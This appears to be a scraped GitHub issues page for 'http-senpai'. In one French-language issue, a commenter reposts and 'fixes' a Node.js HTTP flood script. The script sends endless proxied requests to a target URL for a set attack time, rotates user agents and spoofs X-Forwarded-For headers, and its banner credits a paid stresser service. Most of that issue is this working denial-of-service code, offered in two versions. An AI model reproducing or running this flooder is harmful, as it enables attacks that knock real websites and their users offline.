Git Product home page Git Product logo

http-senpai's People

Contributors

darlingsh1337 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

http-senpai's Issues

pls

Hi Darling Could you give me the source code, I want to redo and improve the script a bit
tg @empfaked I would be glad

c'est quoi ce truc

const request = require('request'),
fs = require('fs'),
proxies = fs.readFileSync(process.argv[3], 'utf-8').match(/S+/g);

process.on('uncaughtException', inutile => {});
process.on('unhandledRejection', inutile => {});

const UAs = [
    'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3599.0 Safari/537.36',
    'Mozilla/5.0 (compatible; Discordbot/2.0; +https://discordapp.com)'
];

setTimeout(() => {
    process.exit(1);
}, process.argv[4] * 1000);

function Send() {
        var p = proxies[Math.floor(Math.random() * proxies.length)];
        request({
            'method': process.argv[5],
            'url': process.argv[2],
            'headers': {
                'Referer': process.argv[2],
                'Accept': '*/*',
                'User-Agent': UAs[Math.floor(Math.random() * [
                    'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3599.0 Safari/537.36',
                    'Mozilla/5.0 (compatible; Discordbot/2.0; +https://discordapp.com)'
                ].length)],
                'Upgrade-Insecure-Requests': '1',
                'X-Forwarded-For': p.split(':')[0]
            },
            'proxy': 'http://' + proxies[Math.floor(Math.random() * proxies.length)]
        }, function (inutile, inutile2, inutile3) {});
    }

setInterval(() => Send() );
console.log('');
console.log('');
console.log('.d8888. d88888b d8b   db d8888b.  .d8b.  d888888b     ');
console.log('88\'  YP 88\'     888o  88 88  `8D d8\' `8b   `88\'   ');
console.log('`8bo.   88ooooo 88V8o 88 88oodD\' 88ooo88    88    ');
console.log('  `Y8b. 88~~~~~ 88 V8o88 88      88~~~88    88    ');
console.log('db   \n8D 88.     88  V888 88      88   88   .88.   ');
console.log('`8888Y\' Y88888P VP   V8P 88      YP   YP Y888888P ');
console.log('');
console.log('            [SENPAI PAID VERSION FOR GENERATION LEAK ]\n');
console.log('');
console.log('[SENPAI] Host > ', process.argv[2]);
console.log('');
console.log('[SENPAI] Mode > ', process.argv[5]);
console.log('');
console.log('[SENPAI] Proxies: %s', process.argv[3]);
console.log('');
console.log('[SENPAI] Time Attack: %s', process.argv[4]);
console.log('');
console.log('[SENPAI] This script made by DarlingSh For StressHub.cc');
console.log('');
console.log(' Latest Updated By S EN P A I  S H');
console.log('');

le scripte na aucun sens tu sais dev ou pas ?
Bon je suis sympa je l'ai corrigé pour toi mon copain ;D

const request = require('request'),
fs = require('fs'),
proxies = fs.readFileSync(process.argv[3], 'utf-8').match(/S+/g),
UAs = [
    'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3599.0 Safari/537.36',
    'Mozilla/5.0 (compatible; Discordbot/2.0; +https://discordapp.com)'
]

setTimeout(() => {
    process.exit(1)
}, process.argv[4] * 1000)

const send = () => {
    let p = proxies[Math.floor(Math.random() * proxies.length)];
        request({
            'method': process.argv[5],
            'url': process.argv[2],
            'headers': {
                'Referer': process.argv[2],
                'Accept': '*/*',
                'User-Agent': UAs[Math.floor(Math.random() * UAs.length)],
                'Upgrade-Insecure-Requests': '1',
                'X-Forwarded-For': p.split(':')[0]
            },
            'proxy': 'http://' + p
        })
    }

setInterval(() => send() );
console.log(`
> Mais c'est de la merde | refais par punchnox prsk la c'est grave

[SENPAI] Host > ${process.argv[2]}

[SENPAI] Mode > ${process.argv[5]}

[SENPAI] Proxies: ${process.argv[3]}

[SENPAI] Time Attack: ${process.argv[4]}



([SENPAI] This script made by DarlingSh For StressHub.cc) ( c'est juste du skid srx )

le script est un peu nul enfaite c'est juste une request avec un proxy

`)

PS: le principe de github c'est l'open source

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.